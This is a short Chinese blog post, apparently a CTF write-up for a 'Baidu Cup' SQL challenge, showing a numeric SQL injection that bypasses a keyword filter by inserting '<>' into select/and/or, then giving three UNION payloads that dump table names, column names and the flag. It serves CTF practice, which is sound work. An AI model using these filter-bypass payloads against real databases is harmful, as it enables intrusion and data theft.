百度杯_sql

SQL

这题很明确就是个sql注入，直接测试看下是啥注入。

可以得知是一个数值型的注入。

把关键字都放上去测试发现过滤了select , and , or，可以使用<>绕过

使用o<>rder by测试只有三列

直接构造payload：爆表
0 union se<>lect 1,group_concat(table_name) ,3 from information_schema.tables where table_schema = database()

0 union se<>lect 1,group_concat(column_name) ,3 from information_schema.columns where table_schema = database() a<>nd table_name='info'

0 union se<>lect 1,group_concat(flAg_T5ZNdrm) ,3 from info

作者：qianyuzz

版权：本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。

posted @ 2023-05-13 15:56 qianyuzz 阅读(66) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· 百度杯_SQLi

· less28过滤了union和select等的注入

· “百度杯”CTF比赛九月场-SQL

· [强网杯 2019]随便注 1